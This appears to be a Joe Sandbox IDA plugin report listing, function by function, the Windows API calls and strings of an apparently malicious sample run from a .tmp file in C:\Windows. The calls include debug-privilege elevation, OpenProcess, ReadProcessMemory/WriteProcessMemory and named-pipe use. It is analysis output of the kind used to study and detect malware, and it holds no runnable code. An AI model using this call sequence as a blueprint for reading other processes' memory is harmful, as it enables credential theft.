LocalFree.KERNEL32(00000002,?,01309B58), ref: 01303288
LocalFree.KERNEL32(00000002,?,01309B58), ref: 01303296
LocalFree.KERNEL32(00000002,?,01309B58), ref: 013032A7
LocalFree.KERNEL32(00000000), ref: 013032B4
LocalFree.KERNEL32(?), ref: 013032CE

Strings

LocalAlloc, xrefs: 013030B6, 01303231
kernel32, xrefs: 013030BF, 01303236

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01301961, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 261

APIs

Part of subcall function 0130184E: NtQuerySystemInformation.NTDLL(00000000,00000000,00000000,00000000), ref: 01301863
Part of subcall function 0130184E: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00001000,?,00000000,0130192A,00000005), ref: 01301880
Part of subcall function 0130184E: GetProcAddress.KERNEL32(00000000,?,00000000,0130192A,00000005), ref: 01301887
Part of subcall function 0130184E: LocalAlloc.KERNELBASE(?,00000000,0130192A,00000005), ref: 0130188D
Part of subcall function 0130184E: NtQuerySystemInformation.NTDLL(?,00000000,00001000,00000000), ref: 0130189D
Part of subcall function 0130184E: LocalFree.KERNEL32(?,?,00000000,0130192A,00000005), ref: 013018AB

Part of subcall function 01301F96: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,0000000100000013,01301A2E), ref: 01301FB1
Part of subcall function 01301F96: GetProcAddress.KERNEL32(00000000), ref: 01301FB8

RtlInitUnicodeString.NTDLL(?,00000000), ref: 01301A39
LocalFree.KERNEL32(00000000), ref: 01301A51
_wcsrchr.LIBCMT ref: 01301AC1
RtlInitUnicodeString.NTDLL(?,-00000002), ref: 01301AD0

Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0130115E
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,0130CD30,00000000), ref: 01301189
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301190
Part of subcall function 01301108: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 013011BC
Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 013011E8
Part of subcall function 01301108: ReadProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0130123A
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 0130126D
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301274
Part of subcall function 01301108: LocalFree.KERNEL32(?), ref: 013012B2

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 01301BAC
GetProcAddress.KERNEL32(00000000), ref: 01301BB3
LocalFree.KERNEL32(?), ref: 01301BFB

Part of subcall function 01301D4C: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,01301C1B), ref: 01301D68
Part of subcall function 01301D4C: NtQueryInformationProcess.NTDLL(00000000,?,?,00000018,?), ref: 01301D95
Part of subcall function 01301D4C: RtlGetCurrentPeb.NTDLL ref: 01301DCB

Part of subcall function 01301C6D: LocalFree.KERNEL32(?,?,?,?,01301C46), ref: 01301C8C

Strings

LocalAlloc, xrefs: 01301B9F
kernel32, xrefs: 01301BA4

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01301DE0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 98

APIs

Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0130115E
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,0130CD30,00000000), ref: 01301189
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301190
Part of subcall function 01301108: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 013011BC
Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 013011E8
Part of subcall function 01301108: ReadProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0130123A
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 0130126D
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301274
Part of subcall function 01301108: LocalFree.KERNEL32(?), ref: 013012B2

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018,?,?,00000000), ref: 01301E50
GetProcAddress.KERNEL32(00000000), ref: 01301E59
GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000109), ref: 01301E9D
GetProcAddress.KERNEL32(00000000), ref: 01301EA0
LocalFree.KERNEL32(?), ref: 01301ED8
LocalFree.KERNEL32(?), ref: 01301EDD

Strings

LocalAlloc, xrefs: 01301E42, 01301E94
kernel32, xrefs: 01301E47, 01301E4C, 01301E99

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 013056E2, Relevance: 10.7, APIs: 7, Instructions: 196

APIs

GetStartupInfoW.KERNEL32(?), ref: 013056EF

Part of subcall function 01306259: Sleep.KERNEL32(00000000,01303889,?,?,?), ref: 01306281

GetFileType.KERNEL32(?), ref: 01305822
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 01305858
GetStdHandle.KERNEL32(-000000F6), ref: 013058AC
GetFileType.KERNEL32(00000000), ref: 013058BE
InitializeCriticalSectionAndSpinCount.KERNEL32(-0130CD94,00000FA0), ref: 013058EC
SetHandleCount.KERNEL32 ref: 01305915

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 013012C3, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125

Strings

LocalAlloc, xrefs: 01301366
kernel32, xrefs: 0130136B

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01303A8C, Relevance: 10.6, APIs: 7, Instructions: 90

APIs

HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,01309D28,00000014), ref: 01303AA7

Part of subcall function 01305973: HeapCreate.KERNELBASE(00000000,00001000,00000000,01303AFB,01309D28,00000014), ref: 0130597C

Part of subcall function 0130490D: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,01303B0C,01309D28,00000014), ref: 01304915
Part of subcall function 0130490D: GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,01303B0C,01309D28,00000014), ref: 01304937
Part of subcall function 0130490D: GetProcAddress.KERNEL32(00000000,FlsGetValue,?,01303B0C,01309D28,00000014), ref: 01304944
Part of subcall function 0130490D: GetProcAddress.KERNEL32(00000000,FlsSetValue,?,01303B0C,01309D28,00000014), ref: 01304951
Part of subcall function 0130490D: GetProcAddress.KERNEL32(00000000,FlsFree,?,01303B0C,01309D28,00000014), ref: 0130495E
Part of subcall function 0130490D: TlsAlloc.KERNEL32(?,01303B0C,01309D28,00000014), ref: 013049AE
Part of subcall function 0130490D: TlsSetValue.KERNEL32(00000000,?,01303B0C,01309D28,00000014), ref: 013049C9
Part of subcall function 0130490D: EncodePointer.KERNEL32(?,01303B0C,01309D28,00000014), ref: 013049E4
Part of subcall function 0130490D: EncodePointer.KERNEL32(?,01303B0C,01309D28,00000014), ref: 013049F1
Part of subcall function 0130490D: EncodePointer.KERNEL32(?,01303B0C,01309D28,00000014), ref: 013049FE
Part of subcall function 0130490D: EncodePointer.KERNEL32(?,01303B0C,01309D28,00000014), ref: 01304A0B
Part of subcall function 0130490D: DecodePointer.KERNEL32(013047DE,?,01303B0C,01309D28,00000014), ref: 01304A2C
Part of subcall function 0130490D: DecodePointer.KERNEL32(00000000,?,01303B0C,01309D28,00000014), ref: 01304A5B
Part of subcall function 0130490D: GetCurrentThreadId.KERNEL32(?,01303B0C,01309D28,00000014), ref: 01304A6D

__RTC_Initialize.LIBCMT ref: 01303B18

Part of subcall function 013056E2: GetStartupInfoW.KERNEL32(?), ref: 013056EF
Part of subcall function 013056E2: GetFileType.KERNEL32(?), ref: 01305822
Part of subcall function 013056E2: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 01305858
Part of subcall function 013056E2: GetStdHandle.KERNEL32(-000000F6), ref: 013058AC
Part of subcall function 013056E2: GetFileType.KERNEL32(00000000), ref: 013058BE
Part of subcall function 013056E2: InitializeCriticalSectionAndSpinCount.KERNEL32(-0130CD94,00000FA0), ref: 013058EC
Part of subcall function 013056E2: SetHandleCount.KERNEL32 ref: 01305915

__amsg_exit.LIBCMT ref: 01303B2B
GetCommandLineW.KERNEL32(01309D28,00000014), ref: 01303B31

Part of subcall function 0130568A: GetEnvironmentStringsW.KERNEL32(00000000,01303B41), ref: 0130568D
Part of subcall function 0130568A: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 013056C9

Part of subcall function 013055DC: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\9706.tmp,00000104), ref: 013055FC
Part of subcall function 013055DC: _wparse_cmdline.LIBCMT ref: 01305626
Part of subcall function 013055DC: _wparse_cmdline.LIBCMT ref: 01305668

__amsg_exit.LIBCMT ref: 01303B51

Part of subcall function 013053AA: _wcslen.LIBCMT ref: 013053CA
Part of subcall function 013053AA: _wcslen.LIBCMT ref: 01305402

__amsg_exit.LIBCMT ref: 01303B62

Part of subcall function 01304E13: __initterm_e.LIBCMT ref: 01304E49

__amsg_exit.LIBCMT ref: 01303B75

Part of subcall function 013020A4: RtlGetNtVersionNumbers.NTDLL(0130CFD0,0130CFCC,0130CFD4), ref: 013020CD
Part of subcall function 013020A4: RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,00000001), ref: 013020E7
Part of subcall function 013020A4: CloseHandle.KERNEL32(0000004C), ref: 01302126

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 013036E8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70

APIs

Part of subcall function 0130363C: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018), ref: 01303667
Part of subcall function 0130363C: GetProcAddress.KERNEL32(00000000), ref: 0130366E
Part of subcall function 0130363C: LocalFree.KERNEL32(?), ref: 013036DC

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000008), ref: 01303771
GetProcAddress.KERNEL32(00000000), ref: 01303778

Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0130115E
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,0130CD30,00000000), ref: 01301189
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301190
Part of subcall function 01301108: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 013011BC
Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 013011E8
Part of subcall function 01301108: ReadProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0130123A
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 0130126D
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301274
Part of subcall function 01301108: LocalFree.KERNEL32(?), ref: 013012B2

LocalFree.KERNEL32(?), ref: 013037B1

Part of subcall function 013033AB: StrChrW.SHLWAPI(00000000,0000005C), ref: 01303480
Part of subcall function 013033AB: wsprintfW.USER32 ref: 013034CB
Part of subcall function 013033AB: GetModuleHandleW.KERNEL32(kernel32,WriteFile,?,?,?,00000000), ref: 0130350F
Part of subcall function 013033AB: GetProcAddress.KERNEL32(00000000), ref: 01303516
Part of subcall function 013033AB: LocalFree.KERNEL32(00000000), ref: 01303523
Part of subcall function 013033AB: LocalFree.KERNEL32(00000000), ref: 01303531
Part of subcall function 013033AB: LocalFree.KERNEL32(?), ref: 0130353F
Part of subcall function 013033AB: LocalFree.KERNEL32(?), ref: 01303551
Part of subcall function 013033AB: LocalFree.KERNEL32(?), ref: 01303561
Part of subcall function 013033AB: LocalFree.KERNEL32(?), ref: 01303571

Strings

LocalAlloc, xrefs: 01303767
kernel32, xrefs: 0130376C

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 013036EA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69

APIs

Part of subcall function 0130363C: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018), ref: 01303667
Part of subcall function 0130363C: GetProcAddress.KERNEL32(00000000), ref: 0130366E
Part of subcall function 0130363C: LocalFree.KERNEL32(?), ref: 013036DC

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000008), ref: 01303771
GetProcAddress.KERNEL32(00000000), ref: 01303778

Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0130115E
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,0130CD30,00000000), ref: 01301189
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301190
Part of subcall function 01301108: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 013011BC
Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 013011E8
Part of subcall function 01301108: ReadProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0130123A
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 0130126D
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301274
Part of subcall function 01301108: LocalFree.KERNEL32(?), ref: 013012B2

LocalFree.KERNEL32(?), ref: 013037B1

Part of subcall function 013033AB: StrChrW.SHLWAPI(00000000,0000005C), ref: 01303480
Part of subcall function 013033AB: wsprintfW.USER32 ref: 013034CB
Part of subcall function 013033AB: GetModuleHandleW.KERNEL32(kernel32,WriteFile,?,?,?,00000000), ref: 0130350F
Part of subcall function 013033AB: GetProcAddress.KERNEL32(00000000), ref: 01303516
Part of subcall function 013033AB: LocalFree.KERNEL32(00000000), ref: 01303523
Part of subcall function 013033AB: LocalFree.KERNEL32(00000000), ref: 01303531
Part of subcall function 013033AB: LocalFree.KERNEL32(?), ref: 0130353F
Part of subcall function 013033AB: LocalFree.KERNEL32(?), ref: 01303551
Part of subcall function 013033AB: LocalFree.KERNEL32(?), ref: 01303561
Part of subcall function 013033AB: LocalFree.KERNEL32(?), ref: 01303571

Strings

LocalAlloc, xrefs: 01303767
kernel32, xrefs: 0130376C

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 0130363C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66

APIs

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018), ref: 01303667
GetProcAddress.KERNEL32(00000000), ref: 0130366E

Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0130115E
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,0130CD30,00000000), ref: 01301189
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301190
Part of subcall function 01301108: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 013011BC
Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 013011E8
Part of subcall function 01301108: ReadProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0130123A
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 0130126D
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301274
Part of subcall function 01301108: LocalFree.KERNEL32(?), ref: 013012B2

LocalFree.KERNEL32(?), ref: 013036DC

Strings

LocalAlloc, xrefs: 01303652
kernel32, xrefs: 01303659

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01302C5B, Relevance: 7.7, APIs: 5, Instructions: 208

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01302D0A

Part of subcall function 013018F7: RtlInitUnicodeString.NTDLL(?,?), ref: 01301917
Part of subcall function 013018F7: LocalFree.KERNEL32(?,?,?), ref: 01301952

OpenProcess.KERNEL32(0130BD30,00000000,?,?,0130CD30,00000000), ref: 01302D35

Part of subcall function 01301000: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000008,00000001,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 0130101D
Part of subcall function 01301000: GetProcAddress.KERNEL32(00000000,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 01301026
Part of subcall function 01301000: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000004,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 01301059
Part of subcall function 01301000: GetProcAddress.KERNEL32(00000000,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 0130105C
Part of subcall function 01301000: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000004,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 01301088
Part of subcall function 01301000: GetProcAddress.KERNEL32(00000000,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 0130108B
Part of subcall function 01301000: LocalFree.KERNEL32(0130CD68,?,00000000,?,01302D60,00000001,00000000), ref: 013010BE

GetCurrentProcess.KERNEL32(?,?,0130CD30,00000000), ref: 01302DDF
IsWow64Process.KERNELBASE(00000000,?,0130CD30,00000000), ref: 01302DE6

Part of subcall function 01301961: RtlInitUnicodeString.NTDLL(?,00000000), ref: 01301A39
Part of subcall function 01301961: LocalFree.KERNEL32(00000000), ref: 01301A51
Part of subcall function 01301961: _wcsrchr.LIBCMT ref: 01301AC1
Part of subcall function 01301961: RtlInitUnicodeString.NTDLL(?,-00000002), ref: 01301AD0
Part of subcall function 01301961: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 01301BAC
Part of subcall function 01301961: GetProcAddress.KERNEL32(00000000), ref: 01301BB3
Part of subcall function 01301961: LocalFree.KERNEL32(?), ref: 01301BFB

Part of subcall function 013010CD: LocalFree.KERNEL32(?,?,01302ED2,?,0130CD30,00000000), ref: 013010EB
Part of subcall function 013010CD: LocalFree.KERNEL32(00458328,?,01302ED2,?,0130CD30,00000000), ref: 013010EE

CloseHandle.KERNEL32(?), ref: 01302EDA

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01304EAA, Relevance: 7.6, APIs: 5, Instructions: 98

APIs

Part of subcall function 013061A7: __amsg_exit.LIBCMT ref: 013061C9
Part of subcall function 013061A7: EnterCriticalSection.KERNEL32(?,?,?,013046E1,0000000D), ref: 013061D1

DecodePointer.KERNEL32(01309DF8,00000020,01305011,?,00000001,00000000,?,01305051,000000FF,?,013061CE,00000011,?,?,013046E1,0000000D), ref: 01304EF4
DecodePointer.KERNEL32(?,01305051,000000FF,?,013061CE,00000011,?,?,013046E1,0000000D), ref: 01304F05

Part of subcall function 01304614: EncodePointer.KERNEL32(00000000,01307302,0130C038,00000314,00000000,?,?,?,?,?,013051B5,0130C038,Microsoft Visual C++ Runtime Library,00012010), ref: 01304616

DecodePointer.KERNEL32(-00000004,?,01305051,000000FF,?,013061CE,00000011,?,?,013046E1,0000000D), ref: 01304F2B
DecodePointer.KERNEL32(?,01305051,000000FF,?,013061CE,00000011,?,?,013046E1,0000000D), ref: 01304F3E
DecodePointer.KERNEL32(?,01305051,000000FF,?,013061CE,00000011,?,?,013046E1,0000000D), ref: 01304F48

Part of subcall function 013060CE: LeaveCriticalSection.KERNEL32(?,013061A5,0000000A,01306195,01309E18,0000000C,013061C2,?,?,?,013046E1,0000000D), ref: 013060DD

Part of subcall function 01304D92: ExitProcess.KERNEL32 ref: 01304DA3

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01307024, Relevance: 7.6, APIs: 5, Instructions: 74

APIs

DecodePointer.KERNEL32(?,?,?,?,?,01307128,?,01309E78,0000000C,01307154,?,?,01304E60,0130594D), ref: 01307039
DecodePointer.KERNEL32(?,?,?,?,?,01307128,?,01309E78,0000000C,01307154,?,?,01304E60,0130594D), ref: 01307046

Part of subcall function 01307CB7: HeapSize.KERNEL32(00000000,00000000,?,00000003,01306DB3,01309E38,00000008,01304D53), ref: 01307CE2

Part of subcall function 013062A5: Sleep.KERNEL32(00000000,00000000,00000000,?,0130709E,00000000,00000010,?,?,?,?,?,01307128,?,01309E78,0000000C), ref: 013062CF

EncodePointer.KERNEL32(00000000,?,?,?,?,?,01307128,?,01309E78,0000000C,01307154,?,?,01304E60,0130594D), ref: 013070AB
EncodePointer.KERNEL32(?,?,?,?,?,?,01307128,?,01309E78,0000000C,01307154,?,?,01304E60,0130594D), ref: 013070BF
EncodePointer.KERNEL32(-00000004,?,?,?,?,?,01307128,?,01309E78,0000000C,01307154,?,?,01304E60,0130594D), ref: 013070C7

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01301EE7, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44

APIs

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 01301F25
GetProcAddress.KERNEL32(00000000), ref: 01301F2C

Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0130115E
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,0130CD30,00000000), ref: 01301189
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301190
Part of subcall function 01301108: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 013011BC
Part of subcall function 01301108: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 013011E8
Part of subcall function 01301108: ReadProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0130123A
Part of subcall function 01301108: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 0130126D
Part of subcall function 01301108: GetProcAddress.KERNEL32(00000000), ref: 01301274
Part of subcall function 01301108: LocalFree.KERNEL32(?), ref: 013012B2

Strings

LocalAlloc, xrefs: 01301F1B
kernel32, xrefs: 01301F20

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 013020A4, Relevance: 4.5, APIs: 3, Instructions: 37

APIs

RtlGetNtVersionNumbers.NTDLL(0130CFD0,0130CFCC,0130CFD4), ref: 013020CD
RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,00000001), ref: 013020E7
CloseHandle.KERNEL32(0000004C), ref: 01302126

Part of subcall function 01301FD9: GetProcessHeap.KERNEL32 ref: 01302000
Part of subcall function 01301FD9: HeapAlloc.KERNEL32(00000000), ref: 01302007
Part of subcall function 01301FD9: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0130201C
Part of subcall function 01301FD9: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 0130202E
Part of subcall function 01301FD9: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 01302052
Part of subcall function 01301FD9: GetModuleHandleW.KERNEL32(kernel32,GetLastError), ref: 01302069
Part of subcall function 01301FD9: GetProcAddress.KERNEL32(00000000), ref: 01302070
Part of subcall function 01301FD9: Sleep.KERNEL32(00000BB8), ref: 01302080
Part of subcall function 01301FD9: WaitNamedPipeW.KERNEL32(?,00000BB8), ref: 0130208C

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 013053AA, Relevance: 3.1, APIs: 2, Instructions: 131

APIs

_wcslen.LIBCMT ref: 013053CA

Part of subcall function 01306259: Sleep.KERNEL32(00000000,01303889,?,?,?), ref: 01306281

_wcslen.LIBCMT ref: 01305402

Part of subcall function 013061DA: HeapFree.KERNEL32(00000000,00000000), ref: 013061F0
Part of subcall function 013061DA: GetLastError.KERNEL32(00000000,?,013047B5,00000000,?,?,013047CC,?,01303806,?,?,01303889), ref: 01306202

Part of subcall function 01304C60: GetCurrentProcess.KERNEL32(C0000417,01303889,?,?,?), ref: 01304C76
Part of subcall function 01304C60: TerminateProcess.KERNEL32(00000000), ref: 01304C7D

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

